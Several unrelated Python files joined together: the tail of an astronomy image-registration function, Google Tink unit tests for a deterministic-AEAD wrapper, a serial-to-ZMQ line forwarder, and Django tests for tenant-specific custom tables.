        "intermediate", im_array, -10.0, 10000.0, sf_dir, "shift1_cube.png",
        snames=original_fnames,
    )

    # write shifts to file; the context manager guarantees the handle is
    # closed even if a write fails (original used a bare open/close pair).
    with open(sf_dir + "shifts.txt", "w") as textfile:
        textfile.write("im, d_row, d_col\n")
        for i, shift in enumerate(shifts_all):
            textfile.write("{},{},{}\n".format(i, *shift))

    return im_array, shifts_all
def create_im(s_dir, ssize1, plotting_yml=None, fdirs=None, method="default"):
    """Take the shifted, cut down images from before, then perform registration
    and combine. Tests should happen before this, as this is a per-star basis.

    Inputs:
        :s_dir: (str) directory for the raw data
        :ssize1: (int) initial pixel search size of box.
        :plotting_yml: (str) path to the plotting configuration file.
        :fdirs: (list of str) file directories.
        :method: (str) image registration method: "default", "saturated",
            "wide", or "saturated wide".

    Raises:
        ValueError: if ``method`` is not one of the supported modes.
    """
    if plotting_yml:
        pl.initialize_plotting(plotting_yml)

    if not fdirs:
        fdirs = glob(s_dir + "*/")

    for sf_dir in fdirs:  # each filter
        files = glob(sf_dir + "sh*.fits")  # might need to change to file_prefix
        nims = len(files)
        frames = u.read_imcube(files)
        frames = frames.astype(float)
        arrsize1 = ssize1 * 2 + 1
        rots = np.zeros((nims, arrsize1, arrsize1))
        newshifts1 = []
        for i in range(nims):  # each image
            image = frames[i, :, :]
            if method == "saturated":
                image_centered, rot, newshifts1 = reg.register_saturated(
                    image, ssize1, newshifts1
                )
                rots[i, :, :] = rot
            elif method == "default":
                image[image < 0.0] = 0.0
                image_centered = reg.register_bruteforce(image)
                if len(image_centered) == 0:
                    print("Resorting to saturated mode.")
                    image_centered, rot, newshifts1 = reg.register_saturated(
                        image, ssize1, newshifts1
                    )
                    rots[i, :, :] = rot
            elif method == "saturated wide":
                rough_center = reg.find_wide_binary(image)
                image_centered, rot, newshifts1 = reg.register_saturated(
                    image, ssize1, newshifts1, rough_center=rough_center
                )
                rots[i, :, :] = rot
            elif method == "wide":
                rough_center = reg.find_wide_binary(image)
                image_centered = reg.register_bruteforce(
                    image, rough_center=rough_center
                )
            else:
                # BUG FIX: an unrecognized method previously fell through and
                # crashed later with NameError on image_centered.
                raise ValueError("Unknown registration method: {!r}".format(method))
            frames[i, :, :] = image_centered  # newimage

        final_im = np.nanmedian(frames, axis=0)
        head = pyfits.getheader(files[0])
        hdu = pyfits.PrimaryHDU(final_im, header=head)
        hdu.writeto(
            sf_dir + "final_im.fits", overwrite=True, output_verify="ignore"
        )

        # Context manager replaces the original bare open/close pair.
        with open(sf_dir + "shifts2.txt", "w") as textfile1:
            textfile1.write("im, d_row, d_col\n")
            for i, item in enumerate(newshifts1):
                textfile1.write("{},{},{}\n".format(i, *item))

        pl.plot_array(
            "rots",
            rots,
            0.0,
            1.0,
            sf_dir,
            "rots.png",
            extent=[-ssize1, ssize1, -ssize1, ssize1],
        )

        # CDD change: use dynamic plot colorscaling (was 0, 10000)
        final_vmin, final_vmax = np.percentile(final_im, [1, 99])
        pl.plot_array(
            "final_im", final_im, final_vmin, final_vmax, sf_dir, "final_image.png"
        )

        # CDD change: use dynamic plot colorscaling (was 0, 10000)
        frames_vmin, frames_vmax = np.percentile(frames, [1, 99])
        pl.plot_array(
            "intermediate", frames, frames_vmin, frames_vmax, sf_dir, "centers.png"
        )

        # calculate and save contrast curve
        seps, delta_mags, all_stds = contrast.ConCur(final_im, verbose=False)
        pl.plot_contrast(seps, delta_mags, sf_dir, 'contrast_curve.png')
        condf = pd.DataFrame({'separation': seps, 'contrast': delta_mags})
        ccfile = sf_dir + 'contrast_curve.csv'
        condf.to_csv(ccfile, index=False)
|
# Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tink.python.tink.aead_wrapper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from tink.proto import tink_pb2
from tink import core
from tink import daead
from tink.testing import helper
def setUpModule():
  # Register the deterministic-AEAD key managers once, before any test runs.
  daead.register()
class AeadWrapperTest(absltest.TestCase):
  """Tests for the primitive-set wrapper around DeterministicAead."""

  def new_primitive_key_pair(self, key_id, output_prefix_type):
    """Return a (fake DAEAD primitive, fake key) pair for the given key id."""
    fake_key = helper.fake_key(
        key_id=key_id, output_prefix_type=output_prefix_type)
    fake_aead = helper.FakeDeterministicAead(
        'fakeDeterministicAead {}'.format(key_id))
    return fake_aead, fake_key

  def test_encrypt_decrypt(self):
    """Round-trip: the wrapped primitive decrypts its own ciphertext."""
    primitive, key = self.new_primitive_key_pair(1234, tink_pb2.TINK)
    pset = core.new_primitive_set(daead.DeterministicAead)
    entry = pset.add_primitive(primitive, key)
    pset.set_primary(entry)
    wrapped_daead = core.Registry.wrap(pset)
    plaintext = b'plaintext'
    associated_data = b'associated_data'
    ciphertext = wrapped_daead.encrypt_deterministically(
        plaintext, associated_data)
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(ciphertext, associated_data),
        plaintext)

  def test_encrypt_decrypt_with_key_rotation(self):
    """Old ciphertexts stay decryptable after the primary key is rotated."""
    primitive, key = self.new_primitive_key_pair(1234, tink_pb2.TINK)
    pset = core.new_primitive_set(daead.DeterministicAead)
    entry = pset.add_primitive(primitive, key)
    pset.set_primary(entry)
    wrapped_daead = core.Registry.wrap(pset)
    ciphertext = wrapped_daead.encrypt_deterministically(
        b'plaintext', b'associated_data')
    # Rotate: add a new key and make it primary.
    new_primitive, new_key = self.new_primitive_key_pair(5678, tink_pb2.TINK)
    new_entry = pset.add_primitive(new_primitive, new_key)
    pset.set_primary(new_entry)
    new_ciphertext = wrapped_daead.encrypt_deterministically(
        b'new_plaintext', b'new_associated_data')
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(ciphertext, b'associated_data'),
        b'plaintext')
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(new_ciphertext,
                                                b'new_associated_data'),
        b'new_plaintext')

  def test_encrypt_decrypt_with_key_rotation_from_raw(self):
    """Ciphertexts made with a RAW (prefix-less) key survive rotation."""
    primitive, raw_key = self.new_primitive_key_pair(1234, tink_pb2.RAW)
    old_raw_ciphertext = primitive.encrypt_deterministically(
        b'plaintext', b'associated_data')
    pset = core.new_primitive_set(daead.DeterministicAead)
    pset.add_primitive(primitive, raw_key)
    new_primitive, new_key = self.new_primitive_key_pair(5678, tink_pb2.TINK)
    new_entry = pset.add_primitive(new_primitive, new_key)
    pset.set_primary(new_entry)
    wrapped_daead = core.Registry.wrap(pset)
    new_ciphertext = wrapped_daead.encrypt_deterministically(
        b'new_plaintext', b'new_associated_data')
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(old_raw_ciphertext,
                                                b'associated_data'),
        b'plaintext')
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(new_ciphertext,
                                                b'new_associated_data'),
        b'new_plaintext')

  def test_encrypt_decrypt_two_raw_keys(self):
    """With two RAW keys, decryption tries each until one succeeds."""
    primitive1, raw_key1 = self.new_primitive_key_pair(1234, tink_pb2.RAW)
    primitive2, raw_key2 = self.new_primitive_key_pair(5678, tink_pb2.RAW)
    raw_ciphertext1 = primitive1.encrypt_deterministically(
        b'plaintext1', b'associated_data1')
    raw_ciphertext2 = primitive2.encrypt_deterministically(
        b'plaintext2', b'associated_data2')
    pset = core.new_primitive_set(daead.DeterministicAead)
    pset.add_primitive(primitive1, raw_key1)
    pset.set_primary(pset.add_primitive(primitive2, raw_key2))
    wrapped_daead = core.Registry.wrap(pset)
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(raw_ciphertext1,
                                                b'associated_data1'),
        b'plaintext1')
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(raw_ciphertext2,
                                                b'associated_data2'),
        b'plaintext2')
    self.assertEqual(
        wrapped_daead.decrypt_deterministically(
            wrapped_daead.encrypt_deterministically(b'plaintext',
                                                    b'associated_data'),
            b'associated_data'), b'plaintext')

  def test_decrypt_unknown_ciphertext_fails(self):
    """A ciphertext from a primitive outside the set must not decrypt."""
    unknown_primitive = helper.FakeDeterministicAead(
        'unknownFakeDeterministicAead')
    unknown_ciphertext = unknown_primitive.encrypt_deterministically(
        b'plaintext', b'associated_data')
    pset = core.new_primitive_set(daead.DeterministicAead)
    primitive, raw_key = self.new_primitive_key_pair(1234, tink_pb2.RAW)
    new_primitive, new_key = self.new_primitive_key_pair(5678, tink_pb2.TINK)
    pset.add_primitive(primitive, raw_key)
    new_entry = pset.add_primitive(new_primitive, new_key)
    pset.set_primary(new_entry)
    wrapped_daead = core.Registry.wrap(pset)
    with self.assertRaisesRegex(core.TinkError, 'Decryption failed'):
      wrapped_daead.decrypt_deterministically(unknown_ciphertext,
                                              b'associated_data')

  def test_decrypt_wrong_associated_data_fails(self):
    """Decryption must fail when the associated data doesn't match."""
    primitive, key = self.new_primitive_key_pair(1234, tink_pb2.TINK)
    pset = core.new_primitive_set(daead.DeterministicAead)
    entry = pset.add_primitive(primitive, key)
    pset.set_primary(entry)
    wrapped_daead = core.Registry.wrap(pset)
    ciphertext = wrapped_daead.encrypt_deterministically(
        b'plaintext', b'associated_data')
    with self.assertRaisesRegex(core.TinkError, 'Decryption failed'):
      wrapped_daead.decrypt_deterministically(ciphertext,
                                              b'wrong_associated_data')
if __name__ == '__main__':
  # Run the absltest runner when the file is executed as a script.
  absltest.main()
|
import serial # apt install python-serial
import zmq # apt install python-zmq
from Logger import Logger
import signal
import sys
from time import sleep
class SerialReader():
    """Reads lines from a serial port and republishes them on a ZMQ PUB socket.

    Command line: <tty path or Logs/ file> [baud] [zmq port] [id].
    Constructing the object runs the whole pipeline: parse args, open the
    serial port, bind the ZMQ publisher, then loop until SIGINT.
    """

    def __init__(self):
        self.connected = False          # serial connection state
        self.enabled = True             # cleared by the SIGINT handler to stop main_loop
        self.baud = 115200
        self.zmqOutPort = "10000"
        self.mserial = "ttyS4"
        self.zmqID = "defaultSerialReader"
        self.get_args()
        self.logger = Logger(self.zmqID)
        zmq_cont = zmq.Context()
        self.publisher = zmq_cont.socket(zmq.PUB)
        signal.signal(signal.SIGINT, self.sigINT_Handler)
        if(self.connect_serial() and self.connect_zmq()):
            self.main_loop()

    def sigINT_Handler(self, signal, frame):
        """Stop the main loop gracefully on Ctrl-C."""
        print (self.zmqID + " detected SigINT signal")
        self.logger.save_line("Signal SigINT detected")
        self.enabled = False

    def deinit(self):
        """Release the ZMQ socket, the serial port and the logger."""
        self.publisher.disconnect('tcp://127.0.0.1:'+str(self.zmqOutPort))
        self.logger.save_line("Publisher disconnected.")
        self.ser.close()
        self.logger.save_line("Serial closed.")
        self.logger.close()

    def get_args(self):
        """Parse sys.argv into serial path, baud rate, ZMQ port and reader id."""
        if(len(sys.argv) < 2):
            print ("Usage: " + str(sys.argv[0]) + " <PATH TO TTY PORT>" +
                   "[opt: <BaudRate> <ZMQPort> <ID>]" )
            print ("Secondary use: " + str(sys.argv[0])
                   + " <PATH TO RAW LOGFILE>")
            sys.exit(0)
        if(len(sys.argv) >= 2):
            self.mserial = sys.argv[1]
            if(sys.argv[1].find("/dev/") >= 0):
                # normal run from a physical device
                self.normalRun = True
            elif(sys.argv[1].find("Logs/") >= 0):
                # replay run from a previously recorded log file
                self.normalRun = False
        if(len(sys.argv) >= 3):
            self.baud = int(sys.argv[2])
        if(len(sys.argv) >= 4):
            self.zmqOutPort = str(sys.argv[3])
        if(len(sys.argv) >= 5):
            self.zmqID = str(sys.argv[4])
        print("Settings -> Serial: " + self.mserial + " speed: "
              + str(self.baud) + " ZMQ port: " + self.zmqOutPort
              + " serial ID: " + str(self.zmqID))

    def connect_serial(self):
        """Open and configure the serial port. Returns True on success."""
        if not self.connected:
            try:
                self.ser = serial.Serial(self.mserial, self.baud)
                self.ser.bytesize = serial.EIGHTBITS
                self.ser.parity = serial.PARITY_NONE
                self.ser.stopbits = serial.STOPBITS_ONE
                # BUG FIX: the original set a misspelled 'self.disconected'
                # flag here, so 'self.connected' was never marked True.
                self.connected = True
                print( "Connected to " + self.mserial)
                if(self.ser.readable()):
                    self.ser.flush()
                    self.ser.readline()  # discard a possibly partial first line
                return True
            except Exception:
                print( "Failed connecting to " + self.mserial)
                return False
        else:
            return True

    def connect_zmq(self):
        """Bind the PUB socket on localhost. Returns True on success."""
        try:
            self.publisher.bind('tcp://127.0.0.1:'+str(self.zmqOutPort))
            self.logger.save_line("Binded to local port: " + self.zmqOutPort)
            self.publisher.send_string(self.zmqID + " binded on port "
                                       + self.zmqOutPort)
        except Exception:
            self.logger.save_line("Failed to bind localPort "
                                  + self.zmqOutPort)
            return False
        # give subscribers a moment to connect before data starts flowing
        sleep(0.5)
        return True

    def main_loop(self):
        """Forward every incoming serial line to the ZMQ publisher until stopped."""
        while self.enabled:
            if(self.ser.readable()):
                raw = self.ser.readline()
                # BUG FIX: pyserial returns bytes on Python 3; decode before
                # string concatenation / send_string, which require str.
                line = raw.decode('UTF-8', errors='replace') if isinstance(raw, bytes) else raw
                self.logger.save_line("Incomming msg: <"+line+">")
                self.publisher.send_string(line)
            sleep(0.001)
        self.deinit()
B = SerialReader()
|
import urllib
from model_mommy import mommy
from django.contrib.contenttypes.models import ContentType
from django.shortcuts import reverse
from django.test import override_settings
from tests.utils import SharedSchemaTenantsAPITestCase
from exampleproject.lectures.models import Lecture
from shared_schema_tenants.helpers.tenants import set_current_tenant
from shared_schema_tenants_custom_data.models import (
TenantSpecificTable, TenantSpecificFieldDefinition)
from shared_schema_tenants_custom_data.serializers import (
TenantSpecificFieldDefinitionCreateSerializer)
from shared_schema_tenants_custom_data.helpers.custom_tables_helpers import (
get_custom_table_manager, _get_pivot_table_class_for_data_type)
class CustomTablesListTests(SharedSchemaTenantsAPITestCase):
    """List/search/filter/paginate/create tests for the custom-tables endpoint."""

    def setUp(self):
        # Fixture: 10 custom tables, each with 10 integer field definitions,
        # and one row per table whose pivot values are i + 5.
        super(CustomTablesListTests, self).setUp()
        self.tables = mommy.make('shared_schema_tenants_custom_data.TenantSpecificTable',
                                 tenant=self.tenant, _quantity=10)
        for table in self.tables:
            # NOTE(review): self.fields is overwritten on every iteration, so
            # after this loop it holds only the last table's definitions —
            # presumably intentional for the row loop below; confirm.
            self.fields = mommy.make(
                'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition', table_id=table.id,
                table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
                data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
                tenant=self.tenant, _quantity=10)
        for table in self.tables:
            self.row = mommy.make(
                'shared_schema_tenants_custom_data.TenantSpecificTableRow', table=table, tenant=self.tenant)
            for i, field in enumerate(self.fields):
                PivotTableClass = _get_pivot_table_class_for_data_type(field.data_type)
                PivotTableClass.objects.filter(
                    row_id=self.row.id, definition=field
                ).update(value=i + 5)
        self.client.force_authenticate(self.user)
        self.view_url = reverse('shared_schema_tenants_custom_data:custom_tables_list')
        validator_gt_2 = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
            module_path='shared_schema_tenants_custom_data.tests.validators.validator_gt_2')
        # Payload used by test_create: one validated and one plain integer field.
        self.params = {
            'name': '_custom_tables__test_table_1',
            'fields_definitions': [
                {
                    'name': 'test1',
                    'data_type': 'integer',
                    'is_required': False,
                    'default_value': 3,
                    'validators': [validator_gt_2.id]
                },
                {
                    'name': 'test2',
                    'data_type': 'integer',
                    'is_required': False,
                    'default_value': 1,
                    'validators': []
                }
            ]
        }

    def test_correct_number_of_tables(self):
        # Without customizable models configured, only the 10 tables are listed.
        response = self.client.get(
            self.view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 10)

    @override_settings(
        SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
            'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
        }
    )
    def test_correct_number_of_tables_with_customizable_models(self):
        # 10 custom tables + 1 customizable model (Lecture) = 11 entries.
        response = self.client.get(
            self.view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 11)

    @override_settings(
        SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
            'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
        }
    )
    def test_search_results_correctly(self):
        get_params_dict = {
            'search': 'lecture',
        }
        # urllib.parse.urlencode on Python 3; urllib.urlencode on Python 2.
        try:
            get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
        except AttributeError:
            get_params = urllib.urlencode(get_params_dict, doseq=True)
        response = self.client.get(
            self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 1)

    @override_settings(
        SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
            'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
        }
    )
    def test_filters_custom_tables_results_correctly(self):
        # Filtering by '_custom_tables' excludes customizable models.
        get_params_dict = {
            'filter': '_custom_tables',
        }
        try:
            get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
        except AttributeError:
            get_params = urllib.urlencode(get_params_dict, doseq=True)
        response = self.client.get(
            self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 10)

    @override_settings(
        SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
            'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
        }
    )
    def test_filters_customizable_models_results_correctly(self):
        # Filtering by 'customizable_models' returns only the Lecture entry.
        get_params_dict = {
            'filter': 'customizable_models',
        }
        try:
            get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
        except AttributeError:
            get_params = urllib.urlencode(get_params_dict, doseq=True)
        response = self.client.get(
            self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 1)

    @override_settings(
        SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
            'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
        }
    )
    def test_paginate_results_correctly(self):
        # Page 2 with length 4 out of 11 total entries still holds 4 results.
        get_params_dict = {
            'page': 2,
            'length': 4,
        }
        try:
            get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
        except AttributeError:
            get_params = urllib.urlencode(get_params_dict, doseq=True)
        response = self.client.get(
            self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data['count'], 11)
        self.assertEqual(len(response.data['results']), 4)

    def test_create(self):
        # POST self.params creates an 11th table with the 2 definitions above.
        response = self.client.post(
            self.view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 201)
        set_current_tenant(self.tenant.slug)
        tables = TenantSpecificTable.objects.all()
        self.assertEqual(tables.count(), 11)
        # The response name is prefixed ('_custom_tables__<name>'); strip it.
        new_table = tables.get(name=response.data['name'].split('__')[1])
        self.assertEqual(new_table.fields_definitions.count(), 2)
@override_settings(
    SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
        'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
    }
)
class CustomTablesDetailsTests(SharedSchemaTenantsAPITestCase):
    """Retrieve/update/destroy tests for one custom table or customizable model."""

    def setUp(self):
        # Fixture: 10 custom tables (10 integer definitions + 1 row each) and
        # 10 tenant-specific definitions attached to the Lecture model.
        super(CustomTablesDetailsTests, self).setUp()
        self.tables = mommy.make('shared_schema_tenants_custom_data.TenantSpecificTable',
                                 tenant=self.tenant, _quantity=10)
        for table in self.tables:
            fields = mommy.make(
                'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition', table_id=table.id,
                table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
                data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
                tenant=self.tenant, _quantity=10)
            self.row = mommy.make(
                'shared_schema_tenants_custom_data.TenantSpecificTableRow', table=table, tenant=self.tenant)
            for i, field in enumerate(fields):
                PivotTableClass = _get_pivot_table_class_for_data_type(
                    field.data_type)
                PivotTableClass.objects.filter(
                    row_id=self.row.id, definition=field
                ).update(value=i + 5)
        self.lecture_fields = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition',
            table_content_type=ContentType.objects.get_for_model(Lecture),
            data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
            tenant=self.tenant, _quantity=10)
        # Two detail URLs: one for a custom table, one for the Lecture model.
        self.custom_table_view_url = reverse(
            'shared_schema_tenants_custom_data:custom_tables_details',
            kwargs={'slug': '_custom_tables__' + self.tables[0].name})
        self.customizable_model_view_url = reverse(
            'shared_schema_tenants_custom_data:custom_tables_details',
            kwargs={'slug': 'lectures__lecture'})
        self.client.force_authenticate(self.user)
        self.validator_gt_2 = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
            module_path='shared_schema_tenants_custom_data.tests.validators.validator_gt_2')
        # Payload used by the update tests: two new integer definitions.
        self.params = {
            'name': '_custom_tables__test_table_1',
            'fields_definitions': [
                {
                    'name': 'test1',
                    'data_type': 'integer',
                    'is_required': False,
                    'default_value': 1,
                    'validators': []
                },
                {
                    'name': 'test2',
                    'data_type': 'integer',
                    'is_required': False,
                    'default_value': 1,
                    'validators': [self.validator_gt_2.id]
                }
            ]
        }

    def test_retrieves_custom_table_correctly(self):
        response = self.client.get(
            self.custom_table_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data['name'], '_custom_tables__' + self.tables[0].name)
        self.assertEqual(len(response.data['fields_definitions']), 10)

    def test_retrieves_customizable_model_correctly(self):
        response = self.client.get(
            self.customizable_model_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data['fields_definitions']), 10)
        self.assertEqual(
            TenantSpecificFieldDefinition.original_manager.filter(
                table_content_type=ContentType.objects.get_for_model(Lecture),
                tenant=self.tenant
            ).count(), 10)

    def test_updates_custom_table_correctly(self):
        # PUT with 2 new definitions plus 1 kept definition -> 3 remain.
        updated_definitions = TenantSpecificFieldDefinitionCreateSerializer(
            self.tables[0].fields_definitions.first()).data
        params = {
            'name': self.params['name'],
            'fields_definitions': self.params['fields_definitions'] + [updated_definitions]
        }
        response = self.client.put(
            self.custom_table_view_url, params, format='json',
            HTTP_TENANT_SLUG=self.tenant.slug)
        set_current_tenant(self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data['fields_definitions']), 3)
        self.assertEqual(self.tables[0].fields_definitions.count(), 3)

    def test_updates_customizable_model_correctly(self):
        updated_definitions = TenantSpecificFieldDefinitionCreateSerializer(
            self.lecture_fields[0]).data
        params = {
            'fields_definitions': self.params['fields_definitions'] + [updated_definitions]
        }
        response = self.client.put(
            self.customizable_model_view_url, params, format='json',
            HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data['fields_definitions']), 3)
        self.assertEqual(
            TenantSpecificFieldDefinition.original_manager.filter(
                table_content_type=ContentType.objects.get_for_model(Lecture),
                tenant=self.tenant
            ).count(), 3)

    def test_destroys_custom_table_correctly(self):
        # Deleting a table also removes its field definitions.
        response = self.client.delete(self.custom_table_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(TenantSpecificTable.objects.filter(id=self.tables[0].id).exists())
        self.assertEqual(
            TenantSpecificFieldDefinition.original_manager.filter(
                table_id=self.tables[0].id,
                table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
                tenant=self.tenant
            ).count(), 0)

    def test_destroys_customizable_model_correctly(self):
        # Deleting the customizable-model entry removes its definitions only.
        response = self.client.delete(
            self.customizable_model_view_url, format='json',
            HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            TenantSpecificFieldDefinition.original_manager.filter(
                table_content_type=ContentType.objects.get_for_model(Lecture),
                tenant=self.tenant
            ).count(), 0)
class TenantSpecificTableRowViewsetTests(SharedSchemaTenantsAPITestCase):
    """CRUD tests for rows of a tenant-specific custom table."""

    def setUp(self):
        # Fixture: one table, 10 integer definitions, one row with values i + 5.
        super(TenantSpecificTableRowViewsetTests, self).setUp()
        self.table = mommy.make('shared_schema_tenants_custom_data.TenantSpecificTable', tenant=self.tenant)
        self.fields = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition', table_id=self.table.id,
            table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
            data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
            tenant=self.tenant, _quantity=10)
        self.row = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificTableRow', table=self.table, tenant=self.tenant)
        for i, field in enumerate(self.fields):
            PivotTableClass = _get_pivot_table_class_for_data_type(field.data_type)
            PivotTableClass.objects.filter(row_id=self.row.id, definition=field).update(value=i + 5)
        self.client.force_authenticate(self.user)
        self.list_view_url = reverse(
            'shared_schema_tenants_custom_data:custom_data_list',
            kwargs={
                'slug': '_custom_tables__' + self.table.name,
            })
        self.details_view_url = reverse(
            'shared_schema_tenants_custom_data:custom_data_details',
            kwargs={
                'slug': '_custom_tables__' + self.table.name,
                'pk': self.row.id,
            })

    def test_list(self):
        response = self.client.get(
            self.list_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 1)

    def test_create(self):
        params = {}
        for i, field in enumerate(self.fields):
            # BUG FIX: was the constant `1 + 1000`; the enumerate index was
            # clearly meant to be used (LecturesViewSetTests uses `i + 1000`).
            params[field.name] = i + 1000
        response = self.client.post(
            self.list_view_url, params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 201)
        set_current_tenant(self.tenant.slug)
        self.assertEqual(get_custom_table_manager(self.table.name).all().count(), 2)

    def test_create_invalid(self):
        params = {}
        for i, field in enumerate(self.fields):
            if i == 0:
                # Attach a 'less than 2' validator so the payload below fails.
                validator_lt_2 = mommy.make(
                    'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
                    module_path='shared_schema_tenants_custom_data.tests.validators.validator_lt_2')
                field.validators.add(validator_lt_2)
            params[field.name] = i + 1000  # BUG FIX: was the constant `1 + 1000`
        response = self.client.post(
            self.list_view_url, params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 400)

    def test_retrieve(self):
        response = self.client.get(
            self.details_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)

    def test_update(self):
        params = {}
        for i, field in enumerate(self.fields):
            params[field.name] = i + 1000  # BUG FIX: was the constant `1 + 1000`
        response = self.client.put(
            self.details_view_url, params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        set_current_tenant(self.tenant.slug)
        # Every submitted value must be readable back from the row.
        for key, value in params.items():
            self.assertEqual(
                getattr(get_custom_table_manager(self.table.name).get(id=self.row.id), key),
                value)
class LecturesViewSetTests(SharedSchemaTenantsAPITestCase):
    """CRUD tests for the Lecture viewset with tenant-specific extra fields."""

    def setUp(self):
        # Fixture: 2 validated (> 2) integer fields on Lecture and one lecture
        # instance whose custom values are i + 100.
        super(LecturesViewSetTests, self).setUp()
        self.validator_gt_2 = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
            module_path='shared_schema_tenants_custom_data.tests.validators.validator_gt_2')
        self.lecture_fields = mommy.make(
            'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition',
            table_content_type=ContentType.objects.get_for_model(Lecture),
            data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
            tenant=self.tenant, validators=[self.validator_gt_2], _quantity=2)
        lecture_fields_values = {
            lf.name: i + 100
            for i, lf in enumerate(self.lecture_fields)
        }
        self.lecture = mommy.make('lectures.Lecture', **lecture_fields_values)
        self.list_view_url = reverse('lectures:list')
        self.details_view_url = reverse(
            'lectures:details', kwargs={'pk': self.lecture.pk})
        self.client.force_authenticate(self.user)
        # Payload for create/update: regular model fields + custom fields (i + 1000).
        self.params = {
            'subject': "Test",
            'description': ("Lorem ipsum dolor sit amet consectetur adipisicing elit. "
                            "Recusandae, qui? Voluptate reprehenderit vel mollitia, "
                            "placeat et aperiam sit voluptatibus eum deserunt corrupti "
                            "nulla quidem nesciunt atque dicta, accusantium ipsam at?"),
            'speaker': self.user.id,
        }
        self.params.update({f.name: i + 1000 for i, f in enumerate(self.lecture_fields)})

    def test_list(self):
        # The list payload must include the tenant-specific field names.
        response = self.client.get(
            self.list_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data), 1)
        self.assertIn(self.lecture_fields[0].name, response.data[0].keys())
        self.assertIn(self.lecture_fields[1].name, response.data[0].keys())

    def test_retrieve(self):
        response = self.client.get(
            self.details_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)

    def test_create(self):
        response = self.client.post(
            self.list_view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 201)
